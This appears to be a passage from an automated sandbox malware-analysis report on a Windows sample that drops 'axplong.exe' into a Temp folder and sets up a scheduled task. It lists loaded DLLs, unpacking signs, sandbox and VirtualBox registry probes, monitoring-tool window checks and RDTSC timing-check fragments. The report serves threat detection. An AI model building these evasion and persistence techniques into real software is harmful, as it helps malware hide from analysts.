                  Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: wtsapi32.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: winsta.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: textshaping.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: explorerframe.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32Jump to behavior
                  Source: file.exeStatic file information: File size 1942016 > 1048576
                  Source: file.exeStatic PE information: Raw size of wpzcbdbk is bigger than: 0x100000 < 0x1a8600

                  Data Obfuscation

                  barindex
                  Detected unpacking (changes PE section rights)
                  Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.10000.0.unpack :EW;.rsrc:W;.idata :W; :EW;wpzcbdbk:EW;remsbmyf:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;wpzcbdbk:EW;remsbmyf:EW;.taggant:EW;
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeUnpacked PE file: 2.2.axplong.exe.400000.0.unpack :EW;.rsrc:W;.idata :W; :EW;wpzcbdbk:EW;remsbmyf:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;wpzcbdbk:EW;remsbmyf:EW;.taggant:EW;
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeUnpacked PE file: 6.2.axplong.exe.400000.0.unpack :EW;.rsrc:W;.idata :W; :EW;wpzcbdbk:EW;remsbmyf:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;wpzcbdbk:EW;remsbmyf:EW;.taggant:EW;
                  Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                  Source: axplong.exe.0.drStatic PE information: real checksum: 0x1e466b should be: 0x1dc1a2
                  Source: file.exeStatic PE information: real checksum: 0x1e466b should be: 0x1dc1a2
                  Source: file.exeStatic PE information: section name:
                  Source: file.exeStatic PE information: section name: .idata
                  Source: file.exeStatic PE information: section name:
                  Source: file.exeStatic PE information: section name: wpzcbdbk
                  Source: file.exeStatic PE information: section name: remsbmyf
                  Source: file.exeStatic PE information: section name: .taggant
                  Source: axplong.exe.0.drStatic PE information: section name:
                  Source: axplong.exe.0.drStatic PE information: section name: .idata
                  Source: axplong.exe.0.drStatic PE information: section name:
                  Source: axplong.exe.0.drStatic PE information: section name: wpzcbdbk
                  Source: axplong.exe.0.drStatic PE information: section name: remsbmyf
                  Source: axplong.exe.0.drStatic PE information: section name: .taggant
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 6_2_0041D84C push ecx; ret 6_2_0041D85F
                  Source: file.exeStatic PE information: section name: entropy: 7.979919668265035
                  Source: file.exeStatic PE information: section name: wpzcbdbk entropy: 7.953456823391056
                  Source: axplong.exe.0.drStatic PE information: section name: entropy: 7.979919668265035
                  Source: axplong.exe.0.drStatic PE information: section name: wpzcbdbk entropy: 7.953456823391056
                  Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeJump to dropped file

                  Boot Survival

                  barindex
                  Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                  Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                  Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                  Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                  Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                  Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: FilemonClassJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: RegmonClassJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: FilemonClassJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: FilemonClassJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: RegmonClassJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: FilemonClassJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: RegmonclassJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: FilemonclassJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: RegmonclassJump to behavior
                  Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\Tasks\axplong.jobJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Tries to detect sandboxes / dynamic malware analysis system (registry check)
                  Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                  Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                  Tries to detect virtualization through RDTSC time measurements
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2096D4 second address: 209714 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84B0D65605h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007F84B0D655F8h 0x0000000f push eax 0x00000010 push edx 0x00000011 je 00007F84B0D655F6h 0x00000017 jmp 00007F84B0D65607h 0x0000001c rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 209A24 second address: 209A2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 209B7F second address: 209B85 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 209CDC second address: 209CE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 209CE2 second address: 209D01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jp 00007F84B0D655F8h 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F84B0D655FFh 0x00000013 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 209E43 second address: 209E52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F84B0B050DBh 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 209FBB second address: 20A000 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84B0D65600h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F84B0D65605h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F84B0D65606h 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 20A000 second address: 20A004 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 20A004 second address: 20A026 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F84B0D6560Ch 0x0000000c jmp 00007F84B0D65606h 0x00000011 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 20A026 second address: 20A02B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 20DB76 second address: 20DB7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 20DB7A second address: 20DBA5 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F84B0B050D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007F84B0B050E7h 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 push esi 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 20DBA5 second address: 20DBB7 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F84B0D655F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b mov eax, dword ptr [eax] 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 20DBB7 second address: 20DBBB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 20DBBB second address: 20DBD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jbe 00007F84B0D655F6h 0x00000015 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 20DBD0 second address: 20DBD6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 20DCC9 second address: 20DD01 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edi 0x00000008 pop edi 0x00000009 push edx 0x0000000a pop edx 0x0000000b popad 0x0000000c popad 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 je 00007F84B0D65610h 0x00000017 pushad 0x00000018 push ecx 0x00000019 pop ecx 0x0000001a jmp 00007F84B0D65606h 0x0000001f popad 0x00000020 mov eax, dword ptr [eax] 0x00000022 pushad 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 popad 0x00000027 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 20DEB9 second address: 20DF0A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F84B0B050DDh 0x0000000b popad 0x0000000c xor dword ptr [esp], 0295CE8Eh 0x00000013 sub edi, dword ptr [ebp+122D29E2h] 0x00000019 push 00000003h 0x0000001b and cx, 2506h 0x00000020 push 00000000h 0x00000022 xor si, 46FAh 0x00000027 push 00000003h 0x00000029 mov dl, 66h 0x0000002b call 00007F84B0B050D9h 0x00000030 pushad 0x00000031 jmp 00007F84B0B050E0h 0x00000036 push eax 0x00000037 push edx 0x00000038 push esi 0x00000039 pop esi 0x0000003a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 21EC3B second address: 21EC40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 22E284 second address: 22E288 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 22E288 second address: 22E28E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 22C49F second address: 22C4A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 22C4A3 second address: 22C4A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 22C789 second address: 22C78D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 22C8B4 second address: 22C8C3 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F84B0D655F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 22C8C3 second address: 22C8EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push edx 0x00000008 jbe 00007F84B0B050D6h 0x0000000e pushad 0x0000000f popad 0x00000010 pop edx 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 push esi 0x00000015 jmp 00007F84B0B050DEh 0x0000001a pop esi 0x0000001b push ecx 0x0000001c pushad 0x0000001d popad 0x0000001e pop ecx 0x0000001f rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 22CA28 second address: 22CA42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007F84B0D65605h 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 22CA42 second address: 22CA48 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 22CA48 second address: 22CA4C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 22CA4C second address: 22CA52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 22CA52 second address: 22CA79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F84B0D655FBh 0x0000000c ja 00007F84B0D655F6h 0x00000012 jp 00007F84B0D655F6h 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 22CA79 second address: 22CA7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 22CA7D second address: 22CA97 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84B0D65606h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 22CA97 second address: 22CA9D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 22CDA2 second address: 22CDA8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 22CDA8 second address: 22CDC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F84B0B050E6h 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 22CDC2 second address: 22CDC6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 22D2B9 second address: 22D2D8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F84B0B050E9h 0x0000000b rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 22DA62 second address: 22DA66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 22DA66 second address: 22DA73 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jnl 00007F84B0B050D6h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 22DE88 second address: 22DE94 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 je 00007F84B0D655F6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 22DE94 second address: 22DE99 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 235C5F second address: 235C7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007F84B0D65607h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1FC95E second address: 1FC962 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1FC962 second address: 1FC968 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1FC968 second address: 1FC98F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c jne 00007F84B0B050D6h 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 pushad 0x00000016 jg 00007F84B0B050D6h 0x0000001c pushad 0x0000001d popad 0x0000001e pushad 0x0000001f popad 0x00000020 jnc 00007F84B0B050D6h 0x00000026 popad 0x00000027 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1F9552 second address: 1F9556 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 239CFC second address: 239D0E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84B0B050DDh 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 239D0E second address: 239D29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F84B0D655FDh 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 239D29 second address: 239D2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 239E75 second address: 239E87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F84B0D655F6h 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 23A41F second address: 23A423 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 23A423 second address: 23A432 instructions: 0x00000000 rdtsc 0x00000002 je 00007F84B0D655F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1F9525 second address: 1F9552 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F84B0B050E4h 0x0000000c jo 00007F84B0B050DEh 0x00000012 jne 00007F84B0B050D6h 0x00000018 pushad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 23AF25 second address: 23AF29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 23B612 second address: 23B617 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 23B6F3 second address: 23B700 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a push esi 0x0000000b pop esi 0x0000000c pop edx 0x0000000d rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 23B700 second address: 23B705 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 23BBF7 second address: 23BC15 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F84B0D655FCh 0x00000008 js 00007F84B0D655F6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 xchg eax, ebx 0x00000011 mov dword ptr [ebp+122D396Ah], edx 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a push esi 0x0000001b push esi 0x0000001c pop esi 0x0000001d pop esi 0x0000001e rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 23BC15 second address: 23BC1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 23BC1B second address: 23BC1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 23BD83 second address: 23BD87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
